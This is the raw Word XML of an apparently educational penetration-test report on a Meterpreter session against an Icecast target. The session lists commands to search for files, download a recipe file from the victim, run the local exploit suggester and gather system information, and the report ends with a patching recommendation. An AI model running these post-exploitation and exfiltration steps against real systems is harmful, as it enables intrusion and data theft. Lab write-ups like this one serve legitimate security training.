            <wp:extent cx="5943600" cy="97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8863" w14:textId="46647565" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Run the command that performs a search for the secretfile.txt on the target.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br/>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>Command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: `search -f *secretfile.txt`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFD181A" w14:textId="77777777" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326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You should now have a Meterpreter session open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37928AFE" w14:textId="6012F429" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Run the command to performs a search for the recipe.txt on the target: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br/>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>Command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: </w:t>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>`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search -f *recipe.txt</w:t>
      </w:r>
      <w:r w:rsidR="009F4C06">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEAFB55" w14:textId="49E4B7B2" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bonus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: Run the command that exfiltrates the recipe*.txt file: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br/>
      </w:r>
      <w:r w:rsidR="005060E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Command</w:t>
      </w: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: `download &lt;c:\Users\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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IEUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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\Documents\Drinks.recipe.txt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B8A32D" w14:textId="01872708" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42CA03D2" wp14:editId="2DC88AF2">
            <wp:extent cx="5943600" cy="449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D122" w14:textId="77777777" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326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You can also use Meterpreter's local exploit suggester to find possible exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7C6AB7" w14:textId="1EA6DDE3" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="005060EC" w:rsidP="00EC326C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>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
      <w:r w:rsidR="00EC326C"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`run post/multi/recon/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EC326C"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local_exploit_suggester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EC326C" w:rsidRPr="00EC326C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4216ECCF" w14:textId="59430690" w:rsidR="00EC326C" w:rsidRPr="00EC326C" w:rsidRDefault="00EC326C" w:rsidP="00EC326C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center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EC326C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B0173C4" wp14:editId="6950BBD7">
            <wp:extent cx="5943600" cy="84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2AC3" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15C847F9" w14:textId="77777777" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060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Bonus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7DD634" w14:textId="77777777" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060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 Run a Meterpreter post script that enumerates all logged on users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598F4BF3" w14:textId="74C52122" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060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Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696198EB" w14:textId="5DAFD6CC" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060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u w:color="000000"/>
          <w:bdr w:val="nil"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E0734CC" wp14:editId="514BA2C2">
            <wp:extent cx="3206750" cy="3994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61EF" w14:textId="77777777" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060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 Open a Meterpreter shell and gather system information for the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549E039C" w14:textId="4A109BC1" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060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Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: `shell` `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFD6631" w14:textId="5369F598" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060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u w:color="000000"/>
          <w:bdr w:val="nil"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65813E0A" wp14:editId="6B5267EE">
            <wp:extent cx="4739640" cy="1197610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3C92" w14:textId="77777777" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060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8E6D8E" w14:textId="31F42FFD" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060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u w:color="000000"/>
          <w:bdr w:val="nil"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A35EDDC" wp14:editId="36D2041A">
            <wp:extent cx="5943600" cy="41484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A320" w14:textId="77777777" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060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37C17D" w14:textId="5E71B992" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060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u w:color="000000"/>
          <w:bdr w:val="nil"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F2DDCC" wp14:editId="7D19B640">
            <wp:extent cx="5943600" cy="2152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C175" w14:textId="77777777" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060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 Run the command that displays the target's computer system information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723898AA" w14:textId="29BD7DDD" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060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Command: ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0045B8EF" w14:textId="34B04E3D" w:rsidR="005060EC" w:rsidRDefault="005060EC" w:rsidP="005060E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u w:color="000000"/>
          <w:bdr w:val="nil"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D33C2E3" wp14:editId="51F164AE">
            <wp:extent cx="4340225" cy="168719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7306" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70049481" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="004EB546" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="668CEB03" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4720AEDA" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BE0C47A" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08DE49A6" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52BC2A2A" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17AA6454" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED7A089" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3136A68D" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A02F97" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="007E6AC9">
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E6874" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2138A3F9" w14:textId="60EF727D" w:rsidR="000F605D" w:rsidRDefault="00B7313A">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B7313A">
        <w:t xml:space="preserve">I would recommend upgrading to a later version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B7313A">
        <w:t>icecast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008005DD">
        <w:t xml:space="preserve"> or using a different music streaming service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F75B4E" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70767CA0" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605D">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000F605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A3B5" w14:textId="77777777" w:rsidR="00B12426" w:rsidRDefault="00B12426">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="626E379E" w14:textId="77777777" w:rsidR="00B12426" w:rsidRDefault="00B1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0488" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605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F9224" w14:textId="77777777" w:rsidR="00B12426" w:rsidRDefault="00B12426">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0BD6563C" w14:textId="77777777" w:rsidR="00B12426" w:rsidRDefault="00B12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93370" w14:textId="77777777" w:rsidR="000F605D" w:rsidRDefault="000F605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F1C09"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D781FC2"/>
    <w:numStyleLink w:val="ImportedStyle1"/>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5014640B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="877A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F197F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D781FC2"/>
    <w:styleLink w:val="ImportedStyle1"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal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96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7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48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637299911">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="815876522">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2062709678">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2062709678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05D"/>
    <w:rsid w:val="000F605D"/>
    <w:rsid w:val="000F73F9"/>
    <w:rsid w:val="00350F2C"/>
    <w:rsid w:val="00450B38"/>
    <w:rsid w:val="00465788"/>
    <w:rsid w:val="005060EC"/>
    <w:rsid w:val="00580E0E"/>
    <w:rsid w:val="0071083A"/>
    <w:rsid w:val="007E6AC9"/>
    <w:rsid w:val="008005DD"/>
    <w:rsid w:val="009F4C06"/>
    <w:rsid w:val="00AC5455"/>
    <w:rsid w:val="00B12426"/>
    <w:rsid w:val="00B7313A"/>
    <w:rsid w:val="00D3389E"/>
    <w:rsid w:val="00E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83FA"/>
  <w15:docId w15:val="{348525F8-8C42-4191-A191-04F0DEDF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uiPriority w:val="10"/>
    <w:qFormat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36"/>
      <w:szCs w:val="36"/>
      <w:u w:val="single" w:color="0563C1"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFF00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</w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="ImportedStyle1">
    <w:name w:val="Imported Style 1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C32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060E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BenQualey@GoodSecurity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Qualey</dc:creator>
  <cp:lastModifiedBy>Ben Qualey</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-27T21:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-27T21:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>